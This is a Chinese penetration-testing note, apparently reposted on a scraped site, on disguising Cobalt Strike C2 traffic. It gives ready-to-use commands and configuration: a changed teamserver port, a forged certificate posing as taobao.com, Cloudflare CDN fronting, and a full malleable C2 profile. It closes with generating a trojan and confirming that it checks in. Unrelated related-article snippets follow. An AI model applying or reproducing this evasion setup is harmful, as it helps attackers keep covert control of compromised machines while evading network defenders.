【渗透测试笔记】之【内网渗透——CS流量隐蔽】

2023-11-12

文章目录

1. 修改端口特征
2. 修改证书特征
2. 配置CDN
3. 生成自定义配置文件
4. 效果演示

1. 修改端口特征

vim teamserver

将默认端口修改：

-Dcobaltstrike.server_port=54321

2. 修改证书特征

删除原有证书（第一次启动会生成cobaltstrike.store），创建新证书cobaltstrike.store

rm cobaltstrike.store

keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"

keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

keytool -list -v -keystore cobaltstrike.store

2. 配置CDN

这里使用cloudflare的CDN。

添加A记录
添加C记录（可选）
在购买域名的站点上将域名服务器更改为CloudFlare的域名服务器
打开AlwaysOnline和开发者模式

在这里插入图片描述

3. 生成自定义配置文件

cs.profile：

#default Beacon sleep duration and jitter
set sleeptime "5000"; 
set jitter    "20";

https-certificate {
    set keystore "cobaltstrike.store";
    set password "123456";
}
http-stager {
    set uri_x86 "/api/1";
    set uri_x64 "/api/2";
    client {
        header "Host" "xxx.xxxx.tk";}
    server {
        output{
        print;
        }
    }
        }
http-get {
    set uri "/api/3";
    client {
        header "Host" "xxx.xxxx.tk";
        metadata {
            base64;
            header "Cookie";
        }
        }
    server {
        output{
        print;
        }
    }
        }
http-post {
    set uri "/api/4";
    client {
        header "Host" "xxx.xxxx.tk";
        id {
            uri-append;
        }
        output{
        print;
        }
    }
    server {
        output{
        print;
        }
    }
}

4. 效果演示

启动服务端

./teamserver xx.xx.xx.xx Password cs.profile

创建http监听器
CloudFlare CDN支持的http端口：80,8080,8880,2052,2082,2086,2098。
生成木马
上线
查看流量发现目的ip为cloudflare的cdn服务器

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

渗透测试

cobalt strike

内网渗透

Windows

网络安全

【渗透测试笔记】之【内网渗透——CS流量隐蔽】的相关文章

如何在 Windows 上为 GeoDjango 安装 GEOS

我正在使用 Python 2 5 Django 1 2 MySQL 和 Apache 启动一个 GeoDjango 项目该项目将上传到 Linux 服务器但开发将在 Windows 上进行问题是我无法通过安装 GEOS 这是怎么完成的
perfmon 性能计数器是否基于与 xperf 使用的 ETW 事件“幕后”相同的东西？

我最近开始熟悉 perfmon 和 xperf Perfmon 使用性能计数器 xperf 使用 ETW Windows 事件跟踪 Perfmon 具有提供数据的对象而 xperf 使用提供者组作为这个领域的新手我想问是否有人可以
命令行字符串的最大长度

在Windows中命令行字符串的最大长度是多少意思是如果我指定一个在命令行上接受参数的程序例如abc exe name abc 我编写的一个简单的控制台应用程序通过命令行获取参数我想知道最大允许数量是多少来自微软文档命令提示符
如何在 Windows 批处理代码中访问列表/数组中的元素？

echo off set Counter 0 set folders 14370437 14707356 16048938 16818856 for f in jpg do call p f goto eof p set a Counter
从 Qt 更改屏幕分辨率？

我想更改屏幕分辨率然后使用一个 ActiveX 控件 Flash 播放器进入全屏显然仅适用于 Windows 的解决方案就可以了有 Qt api 吗还是我需要深入研究 winapi 如果是这样我该在哪里查找关键字谢谢您的帮
UnicodeDecodeError：“charmap”编解码器|安装 pip python-stdnum==1.8 时出错

我对编程还很陌生所以请耐心等待当我为正在使用的模块安装一些必需的软件包时我无法安装python stdnum 1 8 我收到以下错误消息 File C Users 59996 AppData Local Programs Python
如何从系统属性获取Windows操作系统环境变量

我遇到一个关于系统属性环境变量的奇怪问题如你所知我们可以打开Computer gt Property gt Advanced System Settings gt Advanced gt System Environment Varia
Windows 上 PE 文件 (exe) 的最小文件大小是多少？以及最小内存分配？ [复制]

这个问题在这里已经有答案了 Windows 上 PE 文件 exe 的最小文件大小是多少以及最小内存分配我使用 VS 10 附带的 MASM ml exe 和 link exe 组装了以下代码我不能忽略 kernel32 lib 和
netstat 中未显示正在使用的端口，但尝试使用该端口被 Windows 拒绝

我已经找到了这个问题的答案只是想记录我的发现在我最近的一个项目中我发现某个端口不会在 netstat 中显示为正在使用但是当我的项目尝试使用该端口时会抛出错误例如假设我想使用端口 53000 netstat ano finds
最低 DirectX 9.0c 版本以及如何检查它

我们基于 Windows C Ogre 的游戏即将完成在我们公开发布之前我们必须解决这个问题如果未更新到最新的 Dx9 0c 版本 Ogre 在许多测试计算机上都会崩溃所有这些计算机都已经安装了 9 0c 但这一定是旧操作系统预安装
Visual C++ free 和 malloc 的线程安全性？

有谁知道 free 和 malloc 在 Visual C 2010 上是否是线程安全的我遇到了奇怪的问题内存被损坏我几乎认为这是唯一的可能性有谁知道安全装置是否可以打开和关闭以及如何打开和关闭前提是您链接的是线程安全库 http
如何在 Windows 上检查子进程是否被信号杀死

问题给定一个在 python 中启动的子进程其代码类似于 import subprocess p subprocess Popen command stdout subprocess PIPE stderr subprocess PIP
注册表碎片整理程序[重复]

这个问题在这里已经有答案了这是出于好奇但我见过几个其中一些非常流行称为注册表碎片整理程序的软件虽然我可以看到它们提供的好处但我很好奇您到底是如何进行注册表碎片整理的请注意我并不是要求提供软件名称只是询问其如何以编程方式完成
无法在 Windows 7 上安装 Android USB 驱动程序

所以我想使用我的新 Nexus 5 来调试我的应用程序我尝试通过以下方式安装 Android USB 驱动程序装置经理 http developer android com tools extras oem usb html Win7但我
Windows 相当于 Unix find 命令，用于搜索多种文件类型

虽然在 Windows 中安装了 cygwin 可以提供大部分 unix 命令但我仍然想知道如何使用 Windows find 命令在一个命令中搜索多个文件类型 ie find name cpp o name h o name java
需要帮助编写循环任务调度程序

我需要编写一个工具它将按照用户可配置的时间表运行重复任务我将用 C 3 5 编写它它将在 XP Windows 7 或 Windows Server 2008 上运行完成任务大约需要 20 分钟用户可能想要设置多种配置例如每日
在 Windows 上使用“perl6”命令和 Git Bash

使用 Windows 我安装了乐道之星 https rakudo org files和 Git 并确保C rakudo bin and C rakudo share perl6 site bin位于我的 Path 环境变量中现在输入pe
无法启动 Windows 快捷方式

我正在尝试使用 python 启动 Windows 我已经尝试了 os system subprocess call os startfile 等多种方法但总是收到错误消息指出路径不存在我知道路径是正确的因为我尝试在 CMD EXE
虚拟USB设备的安装与仿真

我已经读过创建虚拟USB设备 https stackoverflow com questions 5016363 creating a virtual usb device and 虚拟USB设备 https stackoverflow c
如何使用批处理文件创建 EXE 可执行文件？ [复制]

这个问题在这里已经有答案了我希望能够简单地运行 Windows 批处理文件并让它创建 exe 可执行文件我知道您可以使用以下脚本批量创建文件 echo off echo This will be in a text file gt gt

随机推荐

vue.js鼠标移入变换样式,鼠标移出去除样式(active)实现方法

鼠标移入添加class样式 HTML HTML绑定事件加入或者移出class为active span class things 报事 span span class things 报修 span 注意这里v on不能直接省略为我也不知道
Javascript数组与字典用法分析

http www 68idc cn help makewebs javascript 20141214142024 html 这篇文章主要介绍了Javascript数组与字典用法以实例形式较为详细的分析了Array作为数组与字典的不同用法
Chrome 扩展程序开发

按chrome开发规范我们首先建一个文件夹如D AutoClickDemo 在该文件夹下新建一个名为manifest json的文本文件并按实际情况放一个图片文件作为插件的图标然后新建一个名为myscript js的js脚本文件
SQL查询一个表中根据其中一个列的属性来拼接多个列并SELECT INTO 新表显示

将同一个表中不同 Group 属性的添加列分成一整行 SELECT INTO VP Temp FROM SELECT DISTINCT A ID A TypeName A ItemType A isBad A sNo sNo1 A Che
C++ 类的静态成员详细讲解

在C 中静态成员是属于整个类的而不是某个对象静态成员变量只存储一份供所有对象共用所以在所有对象中都可以共享它使用静态成员变量实现多个对象之间的数据共享不会破坏隐藏的原则保证了安全性还可以节省内存静态成员的定义或声明要加个关键st
C++控制台输入

我们在刷牛客网的题目时经常遇到多组输入执行到文件结束下面介绍几种写法 1 C语言的输入多个整数 while scanf d n EOF 为End Of File的缩写通常在文本的最后存在此字符表示资料结束 code 2 C 输入字符
PyQt实现图形化界面的视频播放

PyQt实现图形化界面的视频播放 PyQt是一款流行的Python GUI库它可以与Python的许多其他工具和库结合使用 OpenCV是一个功能强大的计算机视觉库可以处理图像和视频本文将介绍如何结合使用PyQt和OpenCV来创建一
SSL单双向认证

一 TLS SSL协议 HTTPS协议是在HTTP TLS SSL协议组成的可进行加密传输身份认证的网络协议旨在保证数据传输过程中的保密性完整性和安全性 HTTPS在HTTP和TCP之间增加了TLS SSL协议正是通过TLS协议
Property xxx was accessed during render but is not defined on instance

vue3 x版本在结合element plus使用如果使用了表单元素以及v model指令会在控制台看到类似的警告虽然不影响js运行但是对于强迫症玩家难受的不行下面我们来看一下这个问题是如何产生的应该怎么解决原因 vue3 x版本
HDFS加密区加密过程

HDFS加密区 encryption zone 中的每个文件都使用唯一的数据加密密钥 data encryption key DEK 进行加密明文DEK被区域级加密密钥加密区密钥 encryption zone key EZK 加密成加
灵感爆发：An/flash 影片剪辑动画播放一遍后，摆脱ｐａｌｙ（）的控制

有一个影片剪辑我只想让他播放一次就停下来但是我的播放按钮就一个命令 this play 现在有个矛盾播放按钮和暂停按钮都在暂停在影片剪辑动画的中间还好但是不小心暂停在最后一帧在播放就会从头播放按钮只有一个功能就是从当前帧继续播
MySQL高阶语句（三）

一 NULL值在 SQL 语句使用过程中经常会碰到 NULL 这几个字符通常使用 NULL 来表示缺失的值也就是在表中该字段是没有值的如果在创建表时限制某些字段不为空则可以使用 NOT NULL 关键字不使用则默认可以为空
Webpack 4.X 配置cdn加载资源

众所周知 SPA单页应用首次访问需要加载近全部资源从而导致首页渲染速度很慢继而出现很多性能优化方案图片资源懒加载减少http请求减小请求资源大小减少dom操作避免触发回流重绘 gzip压缩 cdn加载等等今天我们就具体
使用OpenSSL搭建CA

2019独角兽企业重金招聘Python工程师标准 gt gt gt 一 SSL TLS 1 机密性数据加密对称加密 2 完整性保证数据不会被篡改或是因为数据传输丢失单向加密提高特征码附加到数据后 3 可靠性二概述如何实现
ubuntu 18.04 校园网连接问题：MAC物理地址不匹配。

ifconfig belong to net tools net tools have been removed in Ubuntu 18 04 so we need to install net tools by hand Notice
Stable Diffusion实现AI绘画，尝试向实际业务迈进...

前置由于处于学习初期懂得较少以及可能会出现理解错误等情况故而文章仅供参考学习使用旨在分享知识共同学习不能作为依据如有错误感谢指出文章主题分为两部分学习部分也就理论知识实践部分主要包括问题及解决方案一 Stable D
less-loader 报错

当vue页面中初次使用了 lang less 通常会报错信息比如 Module not found Error Can t resolve xxxxxxxx node modules less loader dist cjs js 此时需
多元线性回归模型可视化

绘制平面图绘制房价与房价面积及房间数量之间关系的散点图 import numpy as np import matplotlib pyplot as plt from mpl toolkits mplot3d import A
通俗理解数字签名，数字证书和https

前言最近在开发关于PDF合同文档电子签章的功能大概意思就是在一份PDF合同上签名盖章使其具有法律效应签章有法律效应必须满足两个条件能够证明签名盖章者是谁无法抵赖 PDF合同在签章后不能被更改在纸质合同中由于签名字迹的不可
【渗透测试笔记】之【内网渗透——CS流量隐蔽】

文章目录 1 修改端口特征 2 修改证书特征 2 配置CDN 3 生成自定义配置文件 4 效果演示 1 修改端口特征 vim teamserver 将默认端口修改 Dcobaltstrike server port 54321 2 修改证书

【渗透测试笔记】之【内网渗透——CS流量隐蔽】

文章目录

1. 修改端口特征

2. 修改证书特征

2. 配置CDN

3. 生成自定义配置文件

4. 效果演示

【渗透测试笔记】之【内网渗透——CS流量隐蔽】 的相关文章

随机推荐

热门标签

【渗透测试笔记】之【内网渗透——CS流量隐蔽】的相关文章